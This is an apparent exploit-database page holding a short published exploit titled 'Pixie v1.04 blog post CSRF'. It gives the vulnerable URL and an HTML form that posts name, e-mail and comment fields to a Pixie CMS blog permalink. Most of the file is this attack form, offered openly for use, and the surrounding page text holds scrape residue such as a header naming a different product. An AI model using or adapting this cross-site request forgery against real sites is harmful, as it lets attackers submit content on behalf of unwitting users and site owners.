4e7ab00187
204 changes to exploits/shellcodes Charity Management System CMS 1.0 - Multiple Vulnerabilities
18 lines
No EOL
906 B
Text
18 lines
No EOL
906 B
Text
# Exploit Title: Pixie v1.04 blog post CSRF
|
|
# Google Dork: # Date: 11-Dec-2011
|
|
# Author: hackme
|
|
# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip
|
|
# Version: 1.04# Tested on: Linux Ubuntu 10.10
|
|
# CVE :
|
|
[+] TH4NKZ T0: broiosen,ReGun and hackgame.it
|
|
[+] Vulnerable Url: http://host.com/pixie/?s=blog&m=permalink&x=my-first-post
|
|
[+] Post Method
|
|
[+] exploit:
|
|
|
|
<form method="POST" action="http://127.0.0.1/pixie/?s=blog&m=permalink&x=my-first-post">
|
|
name: <input type="Text" name="name" id="name" size="15"/><br>
|
|
e-mail: <input type="Text" name="email" id="email" size="15"/>
|
|
<br>web(optional): <input type="Text" name="web" id="web" size="15"/><br>
|
|
comment: <input type="Text" name="comment" id="comment" size="15"/><br>
|
|
<input type="Submit" name="comment_submit" id="comment_submit" value="invia" size="15"/>
|
|
<input type="Hidden" name="post" id="post" value="1"/></form> |